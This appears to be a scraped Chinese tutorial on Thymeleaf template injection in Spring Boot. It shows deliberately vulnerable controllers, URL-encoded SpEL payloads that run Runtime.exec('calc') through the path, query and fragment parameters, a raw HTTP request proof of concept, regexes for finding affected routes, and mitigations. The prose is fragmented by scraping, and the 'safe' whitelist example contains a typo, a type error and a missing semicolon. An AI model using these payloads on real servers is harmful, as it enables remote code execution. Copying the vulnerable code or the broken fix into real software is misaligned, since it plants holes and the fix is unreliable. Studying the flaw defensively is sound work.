@RequestMapping("/path")
public String path(@RequestParam String lang) {
return lang ;
}
(向右滑动,查看更多)
GetMapping
的路由为视图名称。http
请求来讲,其实就是将请求的url
作为视图名称,调用模板引擎去解析。@GetMapping("/doc/{document}")
public void getDocument(@PathVariable String document) {
logger.info("Retrieving " + document);
}
__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
(向右滑动,查看更多)
GET /doc/__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1659928725
Connection: close
(向右滑动,查看更多)
payload构造:注意: 模板名称后存在拼接的payload必须以 ::.x结尾
package com.thymeleaf.jack.controller;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
/**
* Author:Jack @Date:2022.09.28
*/
// 通过__${}__::.x构造表达式会由Thymeleaf去执行
@Controller
public class demo {
private static final Logger logger = LogManager.getLogger(demo.class);
@RequestMapping("/index")
public String getIndex(Model model) {
model.addAttribute("name", "jack");
return "index";
}
// 模板后存在拼接的payload必须以 ::.x结尾
//path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
@RequestMapping("/path")
public String path(@RequestParam String lang) {
return "user/" + lang + "/welcome";
}
// 根据spring boot定义,如果controller无返回值,则以GetMapping的路由为视图名称。
// 当然,对于每个http请求来讲,其实就是将请求的url作为视图名称,调用模板引擎去解析
//poc:/doc/__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
@GetMapping("/doc/{document}")
public void getDocument(@PathVariable String document) {
logger.info("Retrieving " + document);
}
//poc 结尾可以去除 ::.x
///fragment?section=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__
@GetMapping("/fragment")
public String fragment(@RequestParam String section) {
return "welcome :: " + section; //fragment is tainted
}
}
(向右滑动,查看更多)
<!DOCTYPE html>
<html lang="en" xmlns:th="http://www.thymeleaf.org">
<head>
<meta charset="UTF-8">
<title>title</title>
</head>
<body>
hello 第一个Thymeleaf程序
<div th:text="${name}"></div>
</body>
</html>
(向右滑动,查看更多)
return.*?\".*?模板名称
return.*?\".*?index
@GetMapping
路由 无return,先正则@GetMapping\(.*?\)\s*public\s+void/gm
@RequestMapping("/vulnpath")
public String path(@RequestParam String lang) {
return lang;
}
@RequestMapping("/safepath")
public String path(@RequestParam int lang) {
int num = request.getParemeter("lang");
HashMap<Integer, String> tems = new HashMap<Integer, String>();
tems.put(1, "red template");
tems.put(2, "yellow template");
tems.put(3, "green template");
return tems.get(num)
}
(向右滑动,查看更多)
@ResponseBody
或者@RestController
则不再调用模板解析@GetMapping("/safe/redirect")
public String redirect(@RequestParam String url) {
return "redirect:" + url;
//CWE-601, as we can control the hostname in redirect
(向右滑动,查看更多)
ThymeleafView
渲染即无法利用,根据spring boot定义,如果名称以redirect:开头,则不再调用ThymeleafView
解析,调用RedirectView
去解析controller的返回值。HttpServletResponse
,设置为HttpServletResponse
,Spring认为它已经处理了HTTP Response,因此不会发生视图名称解析。@GetMapping("/safe/doc/{document}")
public void getDocument(@PathVariable String document, HttpServletResponse response) {
log.info("Retrieving " + document);
}
精彩推荐